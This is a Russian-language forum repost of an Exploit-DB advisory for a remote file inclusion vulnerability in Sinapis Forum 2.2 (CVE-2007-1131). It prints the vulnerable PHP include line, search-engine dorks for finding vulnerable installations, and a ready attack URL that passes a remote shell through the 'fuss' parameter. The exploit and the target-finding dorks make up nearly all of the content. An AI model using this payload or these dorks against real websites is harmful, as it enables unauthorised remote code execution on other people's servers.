Exploit Sinapis Forum 2.2 - 'sinapis.php?fuss' Remote File Inclusion

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3367
Проверка EDB
  1. Пройдено
Автор
KEZZAP66345
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-1131
Дата публикации
2007-02-23
Код:
Sinapis Forum 2.2

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=forum&title=Sinapis%20ForumGästebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="Sinapis by scripter.ch"
Dork1="inurl:sinapis.php"
*****************
ERROR:
if($fuss != ""){include($fuss);}      <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path//sinapis.php?fuss=[SHELL]

# milw0rm.com [2007-02-23]
 
Источник
www.exploit-db.com

Похожие темы